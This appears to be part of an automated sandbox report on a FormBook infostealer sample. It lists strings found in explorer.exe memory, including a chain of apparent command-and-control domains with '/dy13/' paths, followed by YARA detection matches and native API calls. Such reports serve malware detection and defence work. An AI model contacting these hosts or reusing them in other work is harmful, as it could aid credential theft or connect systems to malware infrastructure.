          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 04 Jul 2024 14:37:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Thu, 04 Jul 2024 14:38:05 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0mPPvCPX69pcdROM7u5%2Fb0bkGZQlDADfUQbXkdcE%2B9yRj5Rme31K%2BqG8CruhJjR01jp2lTKm2BQRrLfTCFh9d9SpTsGuufrQ21vYbB%2BBW9ZrQtWG%2FAZ0n9g9t0wUrGPOPNULt1c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89dfdb042ff043bc-EWRalt-svc: h3=":443"; ma=86400Data Raw: 31 31 61 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 Data Ascii: 11a3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots"
          Source: explorer.exe, 00000004.00000000.2007606048.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000004.00000002.4449069859.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2002630977.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
          Source: explorer.exe, 00000004.00000000.2007606048.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000004.00000000.2007606048.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000004.00000000.2007606048.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000004.00000000.2007606048.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000004.00000000.2006094320.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2007043460.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4454060731.0000000008890000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.520yhy.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.520yhy.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.520yhy.com/dy13/www.byfchfyr.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.520yhy.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bum-arch.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bum-arch.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bum-arch.com/dy13/www.northshorehousekeeping.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bum-arch.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.byfchfyr.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.byfchfyr.xyz/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.byfchfyr.xyz/dy13/www.txglobedev.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.byfchfyr.xyzReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cfuhtkwo.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cfuhtkwo.xyz/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cfuhtkwo.xyz/dy13/www.tyupok.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cfuhtkwo.xyzReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cioncarp4213.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cioncarp4213.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cioncarp4213.com/dy13/www.520yhy.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cioncarp4213.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cpuk-finance.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cpuk-finance.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cpuk-finance.com/dy13/www.nearmeacupuncture.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cpuk-finance.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jesuscrewofficial.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jesuscrewofficial.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jesuscrewofficial.com/dy13/www.nestormediaproduction.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jesuscrewofficial.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrwine.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrwine.xyz/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrwine.xyz/dy13/www.cioncarp4213.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrwine.xyzReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nearmeacupuncture.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nearmeacupuncture.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nearmeacupuncture.com/dy13/www.serco2020.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nearmeacupuncture.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nestormediaproduction.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nestormediaproduction.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nestormediaproduction.com/dy13/www.bum-arch.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nestormediaproduction.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.northshorehousekeeping.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.northshorehousekeeping.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.northshorehousekeeping.com/dy13/f
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.northshorehousekeeping.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.serco2020.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.serco2020.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.serco2020.com/dy13/www.mrwine.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.serco2020.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.txglobedev.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.txglobedev.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.txglobedev.com/dy13/www.whysco.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.txglobedev.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyupok.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyupok.xyz/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyupok.xyz/dy13/www.cpuk-finance.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyupok.xyzReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whysco.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whysco.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whysco.com/dy13/www.jesuscrewofficial.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whysco.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yr8gl32.vip
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yr8gl32.vip/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yr8gl32.vip/dy13/www.cfuhtkwo.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yr8gl32.vipReferer:
          Source: explorer.exe, 00000004.00000002.4457096271.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2009295246.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000004.00000000.2005162964.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4452340558.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000004.00000000.2007606048.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000004.00000000.2005162964.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4452340558.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000004.00000000.2003858172.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3775632453.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094309396.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4450922376.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000004.00000003.3098476432.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3098065936.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4455199777.0000000009C22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000004.00000002.4455199777.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3776759138.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3096442625.0000000009C92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000004.00000000.2009295246.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4457096271.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000004.00000000.2007606048.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000004.00000000.2007606048.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: tYEY1UeurGz0Mjb.exe PID: 4196, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: tYEY1UeurGz0Mjb.exe PID: 1216, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: wlanext.exe PID: 3876, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          .NET source code contains very large array initializations
          Source: 0.2.tYEY1UeurGz0Mjb.exe.5640000.7.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
          Source: 0.2.tYEY1UeurGz0Mjb.exe.2d04c4c.3.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041A360 NtCreateFile,3_2_0041A360
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041A410 NtReadFile,3_2_0041A410
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041A490 NtClose,3_2_0041A490
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041A540 NtAllocateVirtualMemory,3_2_0041A540
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041A40A NtReadFile,3_2_0041A40A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041A48C NtClose,3_2_0041A48C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041A53D NtAllocateVirtualMemory,3_2_0041A53D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01A12BF0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12B60 NtClose,LdrInitializeThunk,3_2_01A12B60
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12AD0 NtReadFile,LdrInitializeThunk,3_2_01A12AD0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01A12DF0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12DD0 NtDelayExecution,LdrInitializeThunk,3_2_01A12DD0
